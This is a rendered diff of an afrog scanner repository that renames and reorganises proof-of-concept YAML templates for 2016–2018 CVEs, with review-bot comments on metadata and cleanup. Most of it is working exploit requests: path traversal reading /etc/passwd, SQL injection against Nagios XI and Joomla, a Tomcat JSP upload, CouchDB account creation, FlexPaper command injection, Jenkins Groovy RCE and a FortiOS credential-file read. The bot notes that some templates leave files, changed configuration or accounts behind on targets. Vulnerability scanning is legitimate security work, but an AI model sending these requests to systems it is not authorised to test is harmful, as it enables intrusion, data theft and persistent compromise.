    skipped 9 lines
    10 10   - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    11 11   - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    13  - tags: fileupload,cve,cve2016,apache,activemq
    14  - classification:
    15  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    16  - cvss-score: 9.80
    17  - cve-id: CVE-2016-3088
    18  - cwe-id: CWE-20
    19 13   
    20  -manual: true
    21  -transport: http
    22 14  set:
    23 15   fileContent: randomLowercase(6)
    24 16  rules:
    25 17   r0:
    26 18   request:
    27  - cache: true
    28 19   method: PUT
    29 20   path: /fileserver/afrog-poc.txt
    30 21   body: |
    skipped 1 lines
    32 23   expression: response.status == 204
    33 24   r1:
    34 25   request:
    35  - cache: true
    36 26   method: GET
    37 27   path: /fileserver/afrog-poc.txt
    38  - follow_redirects: false
    39 28   expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
    40 29  expression: r0() && r1()
    41 30   
    skipped 1 lines
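Review bot: Old lines 13-18 delete `tags` and the whole `classification` block (the CVSS vector, `cvss-score: 9.80`, `cve-id` and `cwe-id: CWE-20`); CVE-2017-10271 loses the same fields. These are the only machine-readable severity and weakness data in these files, and consumers that prioritise by CVSS or group findings by CWE lose them, while `severity:` alone is coarse. I cannot tell from the diff whether the afrog schema rejects unknown keys; if it ignores them, keeping `classification` under `info` costs nothing, and if it does reject them, the vector and CWE should be moved into `description` rather than dropped.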
    afrog-pocs/unreviewed/spring-cve-2016-4977.yml afrog-pocs/CVE/2016/CVE-2016-4977.yaml
    1  -id: spring-cve-2016-4977
     1 +id: CVE-2016-4977
    2 2   
    3 3  info:
    4  - name: spring-cve-2016-4977
     4 + name: Spring Security OAuth2 Remote Command Execution
    5 5   author: hanxiansheng26(https://github.com/hanxiansheng26)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test
    19  - follow_redirects: false
    20 16   expression: response.body.bcontains(bytes(string(r1 * r2)))
    21 17  expression: r0()
    22 18   
    afrog-pocs/unreviewed/glassfish-cve-2017-1000028-lfi.yml afrog-pocs/CVE/2017/CVE-2017-1000028.yaml
    1  -id: glassfish-cve-2017-1000028-lfi
     1 +id: CVE-2017-1000028
    2 2   
    3 3  info:
    4  - name: glassfish-cve-2017-1000028-lfi
     4 + name: GlassFish LFI
    5 5   author: sharecast
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
    16 13   follow_redirects: true
    skipped 4 lines
    afrog-pocs/cve/2017/weblogic-cve-2017-10271.yml afrog-pocs/CVE/2017/CVE-2017-10271.yaml
    1 1  id: CVE-2017-10271
    2 2   
    3 3  info:
    4  - name: CVE-2017-10271
     4 + name: WebLogic XMLDecoder CVE-2017-10271
    5 5   author: dr_set
    6 6   severity: high
    7 7   description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
    8 8   reference:
    9 9   - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
    10 10   - https://github.com/SuperHacker-liuan/cve-2017-10271-poc
    11  - tags: cve,cve2017,rce,oracle,weblogic,oast
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    14  - cvss-score: 7.50
    15  - cve-id: CVE-2017-10271
    16 11   
    17  -transport: http
    18 12  set:
    19 13   reverse: newReverse()
    20 14   reverseURL: reverse.url
    skipped 36 lines
    afrog-pocs/unreviewed/supervisord-cve-2017-11610.yml afrog-pocs/CVE/2017/CVE-2017-11610.yaml
    1  -id: supervisord-cve-2017-11610
     1 +id: CVE-2017-11610
    2 2   
    3 3  info:
    4  - name: supervisord-cve-2017-11610
     4 + name: Supervisor XMLRPC Exec
    5 5   author: Loneyer
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   reverse: newReverse()
    12 10   reverseURL: reverse.url
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /RPC2
    19 16   body: |-
    skipped 6 lines
    26 23   </param>
    27 24   </params>
    28 25   </methodCall>
    29  - follow_redirects: false
    30 26   expression: response.status == 200 && reverse.wait(5)
    31 27  expression: r0()
    32 28   
  • afrog-pocs/cve/2017/CVE-2017-12149.yaml afrog-pocs/CVE/2017/CVE-2017-12149.yaml
    Content is identical
    afrog-pocs/unreviewed/tomcat-cve-2017-12615-rce.yml afrog-pocs/CVE/2017/CVE-2017-12615.yaml
    1  -id: tomcat-cve-2017-12615-rce
     1 +id: CVE-2017-12615
    2 2   
    3 3  info:
    4  - name: tomcat-cve-2017-12615-rce
     4 + name: Apache Tomcat RCE
    5 5   author: j4ckzh0u(https://github.com/j4ckzh0u)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   filename: randomLowercase(6)
    12 10   verifyStr: randomLowercase(12)
    skipped 1 lines
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: PUT
    19 16   path: /{(unknown)}.jsp/
    20 17   body: '{{verifyStr}} <%-- {{commentStr}} --%>'
    21  - follow_redirects: false
    22 18   expression: response.status == 201
    23 19   r1:
    24 20   request:
    25  - cache: true
    26 21   method: GET
    27 22   path: /{(unknown)}.jsp
    28  - follow_redirects: false
    29 23   expression: response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr))
    30 24  expression: r0() && r1()
    31 25   
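Review bot: The PUT in r0 uploads a JSP to every vulnerable target and nothing in the PoC removes it, so a scan plants a persistent server-side file that r1 then confirms is executed; add a cleanup rule that sends `DELETE /{{filename}}.jsp/` after r1, or at least state in `info.description` that the dropped file must be removed by hand. The rendered `path` lines show `{(unknown)}.jsp` where the `filename` variable from `set` is expected; that looks like a display artifact, but verify the committed file really uses `{{filename}}`. Dropping `follow_redirects: false` does not affect a `status == 201` check, so that part is fine.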
  • afrog-pocs/cve/2017/CVE-2017-12629.yml afrog-pocs/CVE/2017/CVE-2017-12629.yaml
    Content is identical
    afrog-pocs/cve/2017/couchdb-cve-2017-12635.yml afrog-pocs/CVE/2017/CVE-2017-12635.yaml
    1  -id: couchdb-cve-2017-12635
     1 +id: CVE-2017-12635
    2 2   
    3 3  info:
    4  - name: couchdb-cve-2017-12635
     4 + name: CouchDB CVE-2017-12635
    5 5   author: j4ckzh0u(https://github.com/j4ckzh0u)
    6 6   severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(32)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: PUT
    17 14   path: /_users/org.couchdb.user:{{r1}}
    18 15   headers:
    skipped 7 lines
    26 23   "roles": [],
    27 24   "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
    28 25   }
    29  - follow_redirects: false
    30 26   expression: response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
    31 27  expression: r0()
    32 28   
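Review bot: The PUT to `/_users/org.couchdb.user:{{r1}}` creates a real account on the target with the fixed `"password"` value in the body, so every host this PoC flags ends up with a login whose password is published in this repository. Generate it instead (`pw: randomLowercase(32)` under `set`, then `"password": "{{pw}}"` in the body) and add a note in `info` that the created user has to be deleted afterwards. The skipped body lines presumably carry the duplicated `roles` key that this CVE abuses to grant `_admin`, which would make the leftover account a full administrator — please confirm against the hidden lines. The bump to `severity: critical` is consistent with that.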
    afrog-pocs/unreviewed/nextjs-cve-2017-16877.yml afrog-pocs/CVE/2017/CVE-2017-16877.yaml
    1  -id: nextjs-cve-2017-16877
     1 +id: CVE-2017-16877
    2 2   
    3 3  info:
    4  - name: nextjs-cve-2017-16877
     4 + name: Nextjs v2.4.1 LFI
    5 5   author: Loneyer
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /_next/../../../../../../../../../../etc/passwd
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    18 14  expression: r0()
    19 15   
    skipped 1 lines
    afrog-pocs/unreviewed/netgear-cve-2017-5521.yml afrog-pocs/CVE/2017/CVE-2017-5521.yaml
    1  -id: netgear-cve-2017-5521
     1 +id: CVE-2017-5521
    2 2   
    3 3  info:
    4  - name: netgear-cve-2017-5521
     4 + name: Bypassing Authentication on NETGEAR Routers
    5 5   author: betta(https://github.com/betta-cyber)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /passwordrecovered.cgi?id=get_rekt
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left")
    18 14  expression: r0()
    19 15   
    skipped 1 lines
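Review bot: The change from `severity: high` to `severity: medium` is hard to square with what the rule's own `expression` proves: it matches the `Router Admin Username` and `Router Admin Password` cells, i.e. the device hands the administrator credentials in cleartext to an unauthenticated client. A comparable credential disclosure elsewhere in this commit (CVE-2018-13379) is raised to critical. I would keep `high`, or add a `description` line explaining why this one is rated lower. The POST carries no body; confirm that is intended and not a lost form payload.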
    afrog-pocs/cve/2017/hikvision-cve-2017-7921.yml afrog-pocs/CVE/2017/CVE-2017-7921.yaml
    1  -id: hikvision-cve-2017-7921
     1 +id: CVE-2017-7921
    2 2   
    3 3  info:
    4  - name: hikvision-cve-2017-7921
     4 + name: Hikvision CVE-2017-7921
    5 5   author: whwlsfb(https://github.com/whwlsfb)
    6 6   severity: critical
    7 7   description: |
    skipped 2 lines
    10 10   System/configurationFile?auth=YWRtaW46MTEK
    11 11   reference:
    12 12   - https://www.cnblogs.com/charon1937/p/13819804.html
    13  -manual: true
    14  -transport: http
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2017-7921
     14 + 
    15 15  rules:
    16 16   r0:
    17 17   request:
    18  - cache: true
    19 18   method: GET
    20 19   path: /system/deviceInfo?auth=YWRtaW46MTEK
    21  - follow_redirects: false
    22 20   expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"<firmwareVersion>")
    23 21  expression: r0()
    24 22   
    skipped 1 lines
    afrog-pocs/unreviewed/joomla-cve-2017-8917-sqli.yml afrog-pocs/CVE/2017/CVE-2017-8917.yaml
    1  -id: joomla-cve-2017-8917-sqli
     1 +id: CVE-2017-8917
    2 2   
    3 3  info:
    4  - name: joomla-cve-2017-8917-sqli
    5  - author:
    6  - severity: high
     4 + name: Joomla SQL Injection
     5 + author: unkown
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
    16 13   expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
    skipped 3 lines
    afrog-pocs/unreviewed/phpunit-cve-2017-9841-rce.yml afrog-pocs/CVE/2017/CVE-2017-9841.yaml
    1  -id: phpunit-cve-2017-9841-rce
     1 +id: CVE-2017-9841
    2 2   
    3 3  info:
    4  - name: phpunit-cve-2017-9841-rce
     4 + name: phpunit rce
    5 5   author: p0wd3r,buchixifan
    6 6   severity: high
    7 7   
    skipped 16 lines
    afrog-pocs/unreviewed/gitlist-rce-cve-2018-1000533.yml afrog-pocs/CVE/2018/CVE-2018-1000533.yaml
    1  -id: gitlist-rce-cve-2018-1000533
     1 +id: CVE-2018-1000533
    2 2   
    3 3  info:
    4  - name: gitlist-rce-cve-2018-1000533
     4 + name: GitList < 0.6.0 RCE
    5 5   author: Print1n(https://print1n.top)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    skipped 1 lines
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: GET
    19 16   path: /
    20 17   expression: response.status == 200 && "gitlist".bmatches(response.body)
    skipped 2 lines
    23 20   project_name: search["project_name"]
    24 21   r1:
    25 22   request:
    26  - cache: true
    27 23   method: POST
    28 24   path: /{{project_name}}/tree/a/search
    29 25   headers:
    skipped 7 lines
    afrog-pocs/cve/2018/jenkins-cve-2018-1000600.yml afrog-pocs/CVE/2018/CVE-2018-1000600.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Pre-auth Fully-responded SSRF
     5 + author: geeknik
     6 + severity: high
    5 7   description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
    6 8   reference:
    7 9   - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    8 10   - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
    9  - author: geeknik
    10  - severity: high
    11  - tags: cve,cve2018,jenkins,ssrf,oast
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    14  - cvss-score: 8.80
    15  - cve-id: CVE-2018-1000600
    16  - cwe-id: CWE-200
    17 11   
    18  -manual: true
    19  -transport: http
    20 12  set:
    21 13   reverse: newReverse()
    22 14   reverseUrl: reverse.url
    23 15  rules:
    24 16   r0:
    25 17   request:
    26  - cache: true
    27 18   method: GET
    28 19   path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
    29 20   expression: response.status == 200 && reverse.wait(5)
    skipped 3 lines
    afrog-pocs/cve/2018/jenkins-cve-2018-1000861-rce.yml afrog-pocs/CVE/2018/CVE-2018-1000861.yaml
    skipped 3 lines
    4 4   name: Jenkins 2.138 Remote Command Execution
    5 5   author: dhiyaneshDK,pikpikcu
    6 6   severity: critical
     7 + description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way."
    7 8   reference:
    8 9   - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
    9  - tags: cve,cve2018,jenkin,rce,jenkins
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    12  - cvss-score: 9.80
    13  - cve-id: CVE-2018-1000861
    14  - cwe-id: CWE-502
    15  - description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way."
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861
    16 11   
    17  -manual: true
    18  -transport: http
    19 12  set:
    20 13   rand: randomLowercase(4)
    21 14  rules:
    22 15   r0:
    23 16   request:
    24  - cache: true
    25 17   method: GET
    26 18   path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload;
    27  - follow_redirects: false
    28 19   expression: response.status == 200 && response.body.bcontains(bytes("package#" + rand))
    29 20  expression: r0()
    afrog-pocs/unreviewed/nagio-cve-2018-10735.yml afrog-pocs/CVE/2018/CVE-2018-10735.yaml
    1  -id: nagio-cve-2018-10735
     1 +id: CVE-2018-10735
    2 2   
    3 3  info:
    4  - name: nagio-cve-2018-10735
     4 + name: Nagios XI commandline.php SQL Inject
    5 5   author: 0x_zmz(github.com/0x-zmz)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23
    18  - follow_redirects: false
    19 15   expression: response.body.bcontains(bytes(md5(string(r))))
    20 16  expression: r0()
    21 17   
    afrog-pocs/unreviewed/nagio-cve-2018-10736.yml afrog-pocs/CVE/2018/CVE-2018-10736.yaml
    1  -id: nagio-cve-2018-10736
     1 +id: CVE-2018-10736
    2 2   
    3 3  info:
    4  - name: nagio-cve-2018-10736
     4 + name: Nagios XI SQL Inject
    5 5   author: 0x_zmz(github.com/0x-zmz)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23
    18  - follow_redirects: false
    19 15   expression: response.body.bcontains(bytes(md5(string(r))))
    20 16  expression: r0()
    21 17   
    skipped 1 lines
    afrog-pocs/unreviewed/nagio-cve-2018-10737.yml afrog-pocs/CVE/2018/CVE-2018-10737.yaml
    1  -id: nagio-cve-2018-10737
     1 +id: CVE-2018-10737
    2 2   
    3 3  info:
    4  - name: nagio-cve-2018-10737
     4 + name: Nagios XI SQL Inject
    5 5   author: 0x_zmz(github.com/0x-zmz)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /nagiosql/admin/logbook.php
    18 15   headers:
    19 16   Content-Type: application/x-www-form-urlencoded
    20 17   body: txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
    21  - follow_redirects: false
    22 18   expression: response.body.bcontains(bytes(md5(string(r))))
    23 19  expression: r0()
    24 20   
    skipped 1 lines
    afrog-pocs/unreviewed/nagio-cve-2018-10738.yml afrog-pocs/CVE/2018/CVE-2018-10738.yaml
    1  -id: nagio-cve-2018-10738
     1 +id: CVE-2018-10738
    2 2   
    3 3  info:
    4  - name: nagio-cve-2018-10738
     4 + name: Nagios XI before 5.4.13 SQL Inject
    5 5   author: 0x_zmz(github.com/0x-zmz)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /nagiosql/admin/menuaccess.php
    18 15   headers:
    19 16   Content-Type: application/x-www-form-urlencoded
    20 17   body: selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
    21  - follow_redirects: false
    22 18   expression: response.body.bcontains(bytes(md5(string(r))))
    23 19  expression: r0()
    24 20   
    afrog-pocs/unreviewed/flexpaper-cve-2018-11686.yml afrog-pocs/CVE/2018/CVE-2018-11686.yaml
    1  -id: flexpaper-cve-2018-11686
     1 +id: CVE-2018-11686
    2 2   
    3 3  info:
    4  - name: flexpaper-cve-2018-11686
     4 + name: FlexPaper PHP Publish Service RCE
    5 5   author: Soveless(https://github.com/Soveless)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   fileName: randomLowercase(6)
    12 10   verifyStr: randomLowercase(6)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /php/change_config.php
    19 16   headers:
    skipped 3 lines
    23 20   expression: response.status == 302 || response.status == 200
    24 21   r1:
    25 22   request:
    26  - cache: true
    27 23   method: POST
    28 24   path: /php/change_config.php
    29 25   headers:
    skipped 3 lines
    33 29   expression: response.status == 302 || response.status == 200
    34 30   r2:
    35 31   request:
    36  - cache: true
    37 32   method: GET
    38 33   path: /php/setup.php?step=2&PDF2SWF_PATH=printf%20{{verifyStr}}%25%25{{verifyStr}}%20%3e%20{{fileName}}
    39 34   follow_redirects: false
    40 35   expression: response.status == 200
    41 36   r3:
    42 37   request:
    43  - cache: true
    44 38   method: GET
    45 39   path: /php/{{fileName}}pdf2swf
    46 40   expression: response.status == 200 && response.body.bcontains(bytes(string(verifyStr + "%" + verifyStr)))
    skipped 2 lines
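Review bot: r0 and r1 POST to `/php/change_config.php` and r2 drives `setup.php?step=2` with a `PDF2SWF_PATH` that redirects `printf` output into `{{fileName}}`, so a positive result is obtained by rewriting the application's configuration and leaving a file (`/php/{{fileName}}pdf2swf`) on the target; nothing restores the original settings or removes the file. Add a cleanup step, or at minimum a `description` line telling operators this PoC is state-changing and what it leaves behind. The request bodies of r0/r1 are in the skipped lines, so I cannot tell which config keys are overwritten — verify that the original values can be put back.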
    afrog-pocs/cve/2018/CVE-2018-11759.yml afrog-pocs/CVE/2018/CVE-2018-11759.yaml
    skipped 6 lines
    7 7   description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
    8 8   reference:
    9 9   - https://github.com/immunIT/CVE-2018-11759
    10  - tags: cve,cve2018,apache,tomcat,status
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.50
    14  - cve-id: CVE-2018-11759
    15  - cwe-id: CWE-22
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11759
    16 11   
    17  -manual: true
    18  -transport: http
    19 12  rules:
    20 13   r0:
    21 14   request:
    22  - cache: true
    23 15   method: GET
    24 16   path: /jkstatus;
    25  - follow_redirects: false
    26 17   expression: response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body)
    27 18   r1:
    28 19   request:
    29  - cache: true
    30 20   method: GET
    31 21   path: /jkstatus;?cmd=dump
    32  - follow_redirects: false
    33 22   expression: response.status == 200 && "ServerRoot=*".bmatches(response.body)
    34 23  expression: r0() && r1()
    35 24   
    afrog-pocs/CVE/2018/CVE-2018-12613.yaml
     1 +id: CVE-2018-12613
     2 + 
     3 +info:
     4 + name: PhpMyAdmin 4.8.1 Remote File Inclusion
     5 + author: p0wd3r
     6 + severity: critical
     7 + 
     8 +rules:
     9 + r0:
     10 + request:
     11 + method: GET
     12 + path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
     13 + expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
     14 +expression: r0()
     15 + 
     16 + 
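Review bot: `name` says "Remote File Inclusion", but the request reads `/etc/passwd` through a traversal in the `target` parameter and checks for `root:x:0:0:`, which is a local file inclusion; rename to `PhpMyAdmin 4.8.1 Local File Inclusion` so the finding is not overstated. The rule sends no session cookie, so it can only fire on instances reachable without logging in; add a `description` noting that precondition, and `reference` links as most PoCs in this commit carry. A short comment that `%253f` is the double-encoded `?` the target check strips on would help the next maintainer, though the exact decoding path is not visible here.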
    afrog-pocs/unreviewed/fortigate-cve-2018-13379-readfile.yml afrog-pocs/CVE/2018/CVE-2018-13379.yaml
    1  -id: fortigate-cve-2018-13379-readfile
     1 +id: CVE-2018-13379
    2 2   
    3 3  info:
    4  - name: fortigate-cve-2018-13379-readfile
     4 + name: FortiOS - Credentials Disclosure
    5 5   author: tom0li(https://tom0li.github.io/)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
    16 13   headers:
    skipped 6 lines
    afrog-pocs/unreviewed/kibana-cve-2018-17246.yml afrog-pocs/CVE/2018/CVE-2018-17246.yaml
    1  -id: kibana-cve-2018-17246
     1 +id: CVE-2018-17246
    2 2   
    3 3  info:
    4  - name: kibana-cve-2018-17246
     4 + name: Kibana Local File Inclusion
    5 5   author: canc3s(https://github.com/canc3s)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
    16  - follow_redirects: false
    17 13   expression: response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
    18 14  expression: r0()
    19 15   
    skipped 1 lines
    afrog-pocs/unreviewed/phpcms-cve-2018-19127.yml afrog-pocs/CVE/2018/CVE-2018-19127.yaml
    1  -id: phpcms-cve-2018-19127
     1 +id: CVE-2018-19127
    2 2   
    3 3  info:
    4  - name: phpcms-cve-2018-19127
     4 + name: PHPCMS 2008 Remote Code Execution
    5 5   author: pa55w0rd(www.pa55w0rd.online/)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomInt(800000000, 1000000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss
    18 15   follow_redirects: true
    19 16   expression: response.status == 200
    20 17   r1:
    21 18   request:
    22  - cache: true
    23 19   method: GET
    24 20   path: /data/cache_template/rss.tpl.php?1={{r}}
    25 21   follow_redirects: true
    skipped 4 lines
    afrog-pocs/unreviewed/rails-cve-2018-3760-rce.yml afrog-pocs/CVE/2018/CVE-2018-3760.yaml
    1  -id: rails-cve-2018-3760-rce
     1 +id: CVE-2018-3760
    2 2   
    3 3  info:
    4  - name: rails-cve-2018-3760-rce
     4 + name: Ruby On Rails Path Traversal
    5 5   author: leezp
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /assets/file:%2f%2f/etc/passwd
    16  - follow_redirects: false
    17 13   expression: response.status == 500 && response.body.bcontains(b"FileOutsidePaths")
    18 14   output:
    19 15   search: '"/etc/passwd is no longer under a load path: (?P<path>.*?),".bsubmatch(response.body)'
    20 16   path: search["path"]
    21 17   r1:
    22 18   request:
    23  - cache: true
    24 19   method: GET
    25 20   path: /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
    26  - follow_redirects: false
    27 21   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    28 22  expression: r0() && r1()
    29 23   
    skipped 1 lines
    afrog-pocs/unreviewed/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml afrog-pocs/CVE/2018/CVE-2018-6605.yaml
    1  -id: joomla-ext-zhbaidumap-cve-2018-6605-sqli
     1 +id: CVE-2018-6605
    2 2   
    3 3  info:
    4  - name: joomla-ext-zhbaidumap-cve-2018-6605-sqli
     4 + name: Joomla Ext zhbaidumap sql inject
    5 5   author: leezp
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   rand: randomInt(2000000000, 2100000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
    18 15   headers:
    19 16   Content-Type: application/x-www-form-urlencoded
